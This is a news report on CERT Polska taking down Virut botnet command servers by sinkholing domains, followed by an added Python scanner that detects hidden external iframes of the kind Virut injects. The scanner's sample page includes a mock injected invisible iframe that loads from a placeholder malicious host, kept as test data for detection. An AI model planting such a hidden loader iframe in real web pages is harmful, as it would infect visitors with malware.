22 Jan 2013
CERT Poland has taken down the central command and control servers of the Virut botnet, curtailing the activity of this zombie herder after confirming that systems infected with Virut were remotely controlled by crooks from those servers.
CERT Polska sinkholed several domain names, including some associated over the years with other illegal activities led by notorious botnets such as Palevo or ZeuS. Investigators used these seized domains to intercept communication attempts between compromised computers and the crooks.
“NASK’s actions are aimed at protecting Internet users from threats that involved the botnet built with Virut-infected machines, such as DDoS attacks, spam and data theft,” CERT Polska writes. “The scale of the phenomenon was massive: in 2012 for Poland alone, over 890 thousand unique IP addresses were reported to be infected by Virut.”
Virut mainly spreads through infected files shared over networks or compromised removable media. More recent variants inject an IFrame into HTML files that triggers the download of Virut from a remote location. Once on the system, Virut connects to its C&C server and awaits instructions, which may include downloading and installing more malware, sending spam or carrying out DDoS attacks.
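The injected-IFrame vector described above has a recognisable shape on disk: an iframe whose src points at a host other than the site's own and whose size or style keeps it invisible to the visitor. The following scanner, an added example that is not code from the article or from CERT Polska, walks the HTML of a page and reports iframes that are both external and hidden, which is a useful check when auditing a web server suspected of carrying this kind of injection. The site hostname, the sample page and the "malware-host.invalid" placeholder are all constructed for the example.

```python
"""Flag hidden, external <iframe> tags in HTML files.

Added example, not code from the original article or from CERT Polska.
The heuristics (zero-size frame, display:none, off-screen placement, src on a
foreign host) are assumptions about what an injected loader frame looks like,
not a signature of any specific Virut sample.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Style fragments that make an iframe invisible to the viewer.
_HIDING_STYLE_TOKENS = ("display:none", "visibility:hidden")


def _is_hidden(attrs):
    """Return True if the iframe's attributes hide it from the visitor."""
    width = attrs.get("width", "").strip().rstrip("px")
    height = attrs.get("height", "").strip().rstrip("px")
    style = attrs.get("style", "").replace(" ", "").lower()
    if width in ("0", "1") or height in ("0", "1"):
        return True
    if any(tok in style for tok in _HIDING_STYLE_TOKENS):
        return True
    # Off-screen placement such as "position:absolute;left:-9999px".
    if "left:-" in style or "top:-" in style:
        return True
    return False


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def find_suspicious_iframes(html, site_host):
    """Return findings for iframes that point off-site AND are hidden.

    site_host is the hostname the page legitimately belongs to; an iframe
    whose src resolves to a different host is treated as external.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        external = bool(host) and host.lower() != site_host.lower()
        if external and _is_hidden(attrs):
            findings.append({"src": src, "host": host})
    return findings


# Constructed sample page: one legitimate embedded video frame, plus an
# injected invisible frame pointing at a placeholder foreign host.
SAMPLE_HTML = """
<html><body>
<h1>Company news</h1>
<iframe src="https://www.example-site.test/embed/video" width="640" height="360"></iframe>
<iframe src="http://malware-host.invalid/load.php" width="0" height="0" style="display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML, "www.example-site.test"):
        print("suspicious iframe:", finding["src"])
```

Run against a whole document root, the function would be called once per HTML file with the site's own hostname; a hit is a strong indicator that the file was tampered with, because legitimate embeds are rarely both off-site and deliberately invisible.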